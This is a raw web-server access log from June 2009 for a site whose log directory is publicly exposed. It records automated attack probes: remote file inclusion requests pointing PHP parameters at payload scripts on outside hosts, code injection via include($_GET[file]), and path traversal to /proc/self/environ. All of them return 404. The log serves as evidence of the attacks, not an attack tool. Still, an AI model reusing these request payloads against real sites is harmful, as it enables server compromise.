70.86.9.234 - - [29/Jun/2009:03:21:04 -0700] "GET /logs/access_090413.log//admin/classes/TplLoad.php?full_path_to_public_program=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:03:21:27 -0700] "GET /logs/access_090413.log//admin/classes/TplLoad.php?full_path_to_public_program=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:22:18 -0700] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:22:18 -0700] "GET /logs/access.log/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:22:18 -0700] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:03:22:24 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:03:22:28 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:22:59 -0700] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:22:59 -0700] "GET /logs/access.log/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:22:59 -0700] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:03:26:05 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:03:26:06 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:03:26:06 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:03:26:06 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:03:26:06 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:03:26:06 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:03:26:07 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:03:26:07 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:03:26:07 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:03:26:07 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:03:26:07 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
67.161.198.16 - - [29/Jun/2009:03:26:07 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
218.234.21.178 - - [29/Jun/2009:03:29:25 -0700] "GET /logs/access.log/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [29/Jun/2009:03:29:25 -0700] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [29/Jun/2009:03:29:25 -0700] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [29/Jun/2009:03:29:25 -0700] "GET /logs/access.log/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [29/Jun/2009:03:29:25 -0700] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [29/Jun/2009:03:29:25 -0700] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:03:32:25 -0700] "GET /logs/access.log//facileforms.frame.php?ff_compath=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:03:32:26 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:03:32:26 -0700] "GET /logs/access.log//facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:03:32:27 -0700] "GET /logs/access.log//facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:33:23 -0700] "GET /logs/access_090413.log/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:35:25 -0700] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:35:25 -0700] "GET /logs/access.log/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:35:31 -0700] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:36:34 -0700] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:36:35 -0700] "GET /logs/access.log/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "vspeaking.com"
65.23.158.226 - - [29/Jun/2009:03:36:35 -0700] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "vspeaking.com"
217.237.150.52 - - [29/Jun/2009:03:38:47 -0700] "GET /logs/ HTTP/1.0" 200 2209 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.vspeaking.com"
217.237.150.52 - - [29/Jun/2009:03:38:48 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.vspeaking.com"
217.237.150.53 - - [29/Jun/2009:03:39:50 -0700] "GET /logs/access.log HTTP/1.0" 200 337142 "http://www.vspeaking.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.vspeaking.com"
217.237.150.52 - - [29/Jun/2009:03:39:52 -0700] "GET /logs/access_090629.log HTTP/1.0" 200 3655906 "http://www.vspeaking.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.vspeaking.com"
60.251.217.4 - - [29/Jun/2009:03:40:56 -0700] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
80.24.77.95 - - [29/Jun/2009:03:46:35 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.vietnamngaymai.org/ngaymai/modules/Forums/admin/.../syx.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
80.24.77.95 - - [29/Jun/2009:03:46:36 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.vietnamngaymai.org/ngaymai/modules/Forums/admin/.../syx.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
80.24.77.95 - - [29/Jun/2009:03:46:52 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.vietnamngaymai.org/ngaymai/modules/Forums/admin/.../syx.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
218.234.21.178 - - [29/Jun/2009:03:50:29 -0700] "GET /logs/access.log/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
218.234.21.178 - - [29/Jun/2009:03:50:29 -0700] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
218.234.21.178 - - [29/Jun/2009:03:50:29 -0700] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
218.234.21.178 - - [29/Jun/2009:03:50:59 -0700] "GET /logs/access.log/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "vspeaking.com"
218.234.21.178 - - [29/Jun/2009:03:50:59 -0700] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "vspeaking.com"
218.234.21.178 - - [29/Jun/2009:03:50:59 -0700] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "vspeaking.com"
83.98.209.71 - - [29/Jun/2009:03:51:30 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 200 2225 "-" "libwww-perl/5.79" "vspeaking.com"
83.98.209.71 - - [29/Jun/2009:03:51:30 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "vspeaking.com"
83.98.209.71 - - [29/Jun/2009:03:51:32 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "vspeaking.com"
208.96.54.70 - - [29/Jun/2009:03:54:11 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.vspeaking.com"
208.96.54.70 - - [29/Jun/2009:03:54:13 -0700] "GET /logs/access.log HTTP/1.1" 200 341167 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:03:55:38 -0700] "GET /e404.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:03:55:38 -0700] "GET /e404.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:04:03:44 -0700] "GET /logs/access.log//e404.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:04:03:44 -0700] "GET /e404.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:04:03:44 -0700] "GET /logs//e404.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:04:03:55 -0700] "GET /logs/access.log//e404.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:04:03:55 -0700] "GET /e404.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:04:03:55 -0700] "GET /logs//e404.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "vspeaking.com"
86.39.131.85 - - [29/Jun/2009:04:10:26 -0700] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
86.39.131.85 - - [29/Jun/2009:04:10:26 -0700] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
86.39.131.85 - - [29/Jun/2009:04:10:26 -0700] "GET /logs/access.log%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.247.76.181 - - [29/Jun/2009:04:11:36 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.247.76.181 - - [29/Jun/2009:04:11:36 -0700] "GET /logs/scripts.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.247.76.181 - - [29/Jun/2009:04:11:36 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
86.39.131.85 - - [29/Jun/2009:04:11:44 -0700] "GET /logs/access.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
86.39.131.85 - - [29/Jun/2009:04:12:54 -0700] "GET /logs/access_090105.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
80.24.77.95 - - [29/Jun/2009:04:13:00 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.vietnamngaymai.org/ngaymai/modules/Forums/admin/.../syx.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
80.24.77.95 - - [29/Jun/2009:04:13:01 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.vietnamngaymai.org/ngaymai/modules/Forums/admin/.../syx.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
80.24.77.95 - - [29/Jun/2009:04:13:01 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.vietnamngaymai.org/ngaymai/modules/Forums/admin/.../syx.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
194.63.248.44 - - [29/Jun/2009:04:13:13 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [29/Jun/2009:04:13:13 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [29/Jun/2009:04:13:13 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:04:16:00 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:04:16:00 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:04:16:03 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [29/Jun/2009:04:16:11 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [29/Jun/2009:04:16:11 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [29/Jun/2009:04:16:11 -0700] "GET /logs/access.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:04:16:13 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:04:16:13 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:04:16:13 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
69.175.14.66 - - [29/Jun/2009:04:17:47 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.vspeaking.com"
194.63.248.44 - - [29/Jun/2009:04:18:11 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [29/Jun/2009:04:18:11 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [29/Jun/2009:04:18:11 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:04:19:16 -0700] "GET /logs/access.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:04:19:39 -0700] "GET /logs/access.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
131.203.76.246 - - [29/Jun/2009:04:20:02 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://67.222.48.109/images/.ray/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
131.203.76.246 - - [29/Jun/2009:04:20:02 -0700] "GET /logs/access.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://67.222.48.109/images/.ray/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
131.203.76.246 - - [29/Jun/2009:04:20:02 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://67.222.48.109/images/.ray/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
